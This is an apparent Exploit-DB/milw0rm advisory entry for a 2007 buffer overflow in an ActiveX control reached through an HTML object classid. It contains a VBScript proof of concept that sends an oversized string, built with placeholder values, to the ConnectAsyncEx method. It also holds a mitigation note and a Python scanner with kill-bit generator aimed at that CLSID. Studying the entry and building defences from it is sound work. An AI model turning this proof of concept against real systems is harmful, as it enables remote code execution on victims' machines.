by: Unknown
CVSS: 7.5 (HIGH)
CWE: 119
Patch Exists: NO
2007

Object Classid Exploit

This exploit takes advantage of a vulnerability reached through the classid attribute of the HTML object element: the classid loads a specific ActiveX control (clsid:62FA83F7-20EC-4D62-AC86-BAB705EE1CCD), which the page exposes to script as target. By serving a specially crafted object element, an attacker can trigger arbitrary code execution. In this specific example, VBScript builds an overlong string from 3543 "A" characters, the two 4-character placeholder values get_EAX and get_EBX, and 1440 "B" characters, creating a buffer overflow. The crafted buffer is then passed as the first argument to the ConnectAsyncEx method of the target object, leading to code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate any external data used in HTML elements. Additionally, disabling or restricting the execution of scripting languages like VBScript can help prevent exploitation.
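
Because the entry lists no patch, one concrete way to restrict the control is Internet Explorer's kill bit. The sketch below is an added example, not part of the original entry or its PoC: it flags HTML that instantiates the CLSID shown on this page and renders the .reg entries that set the kill bit for it. The function names, the blocklist and the sample markup are assumptions constructed for illustration.

```python
from html.parser import HTMLParser

# CLSID taken from the PoC on this page; extend the set for other controls.
BLOCKED_CLSIDS = {"62FA83F7-20EC-4D62-AC86-BAB705EE1CCD"}
KILL_BIT = 0x400  # "Compatibility Flags" value that stops IE loading a control
KEY = r"[HKEY_LOCAL_MACHINE\%s\Microsoft\Internet Explorer\ActiveX Compatibility\{%s}]"

def normalize_clsid(value):
    """Return the bare upper-case GUID from a classid attribute, or None."""
    value = (value or "").strip()
    if not value.lower().startswith("clsid:"):
        return None
    return value[6:].strip().strip("{}").upper()

class ObjectScanner(HTMLParser):
    """Collects (clsid, element id) for every <object> that loads a COM class."""
    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, not attribute values.
        if tag == "object":
            a = dict(attrs)
            clsid = normalize_clsid(a.get("classid"))
            if clsid:
                self.found.append((clsid, a.get("id")))

def blocked_objects(html):
    """Return the <object> instantiations in html whose CLSID is blocklisted."""
    scanner = ObjectScanner()
    scanner.feed(html)
    return [hit for hit in scanner.found if hit[0] in BLOCKED_CLSIDS]

def kill_bit_reg(clsid):
    """Render .reg text setting the kill bit in the 64-bit and 32-bit views."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for root in (r"SOFTWARE", r"SOFTWARE\Wow6432Node"):
        lines += [KEY % (root, clsid),
                  '"Compatibility Flags"=dword:%08x' % KILL_BIT, ""]
    return "\n".join(lines)

# Constructed sample: loads the control in mixed case, carries no payload.
SAMPLE = ("<html><OBJECT ClassID='CLSID:62fa83f7-20ec-4d62-ac86-bab705ee1ccd' "
          "id='t'></OBJECT></html>")

if __name__ == "__main__":
    for clsid, elem_id in blocked_objects(SAMPLE):
        print(f"blocked control {clsid} instantiated as id={elem_id!r}")
        print(kill_bit_reg(clsid))
```

The scanner only sees static object markup, so treat it as triage for cached pages or proxy captures; the kill bit is what actually stops Internet Explorer from loading the class.
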

Exploit-DB raw data:

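<html>
  <!-- The classid loads the ActiveX control and exposes it to script as 'target' -->
  <object classid='clsid:62FA83F7-20EC-4D62-AC86-BAB705EE1CCD' id='target'></object>
  <script language='vbscript'>
    ' 3543 characters of leading filler
    buff = String(3543, "A")

    ' Two 4-character placeholder values
    get_EAX = "aaaa"
    get_EBX = "cccc"

    ' 1440 characters of trailing filler
    buff2 = String(1440, "B")

    egg = buff + get_EAX + get_EBX + buff2

    ' The oversized string is passed as the first argument
    target.ConnectAsyncEx egg, 1, "default"
  </script>
</html>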

# milw0rm.com [2007-05-08]